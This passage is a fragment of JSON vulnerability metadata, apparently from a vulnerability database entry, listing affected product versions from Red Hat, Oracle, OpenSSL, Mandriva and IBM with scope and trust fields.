0.3, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux load balancer eus 6.5.z", "scope": null, "trust": 0.3, "vendor": "redhat", "version": null }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop workstation client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl e", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl d", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl 1.0.1h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "project openssl 1.0.0m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8za", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8y", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8x" }, { "model": "project openssl 0.9.8w", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8u", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8t", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8v" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "vios fp-25 sp-02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.15" }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "tivoli workload scheduler for applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "tivoli workload scheduler for applications fp01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "tivoli workload scheduler for applications fp02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "tivoli provisioning manager for images system edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x7.1.1.0" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.0" }, { "model": "tivoli netcool/reporter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "tivoli netcool system service monitor fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "tivoli netcool system service monitor fp14", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "tivoli netcool system service monitor fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "tivoli management framework", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.3" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.2" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.2" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.1.21" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.1.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.1.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.1.21" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.1.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.1.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.1.21" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.1.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.1.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.1" }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "security network intrusion prevention system gv200", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "security network intrusion prevention system gv200", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "security network intrusion prevention system gv200", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "security network intrusion prevention system gv200", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "security network intrusion prevention system gv200", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.6" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.5" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.3" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.2" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.4" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.3" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.2" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.1" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.0" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2.1" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2.0" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.1.0" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2.3" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2.2" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.5" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.4" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.0" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.0" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.1" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.0" }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0.1" }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "puredata system for operational analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1768" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1209" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.913" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.470" }, { "model": "proventia network security controller 1.0.3352m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "proventia network security controller 1.0.3350m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.6.1" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.6" }, { "model": "oncommand workflow automation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5" }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1" }, { "model": "megaraid storage manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "15.03.01.00" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "gpfs for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.0.11" }, { "model": "gpfs for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.0" }, { "model": "flex system manager", 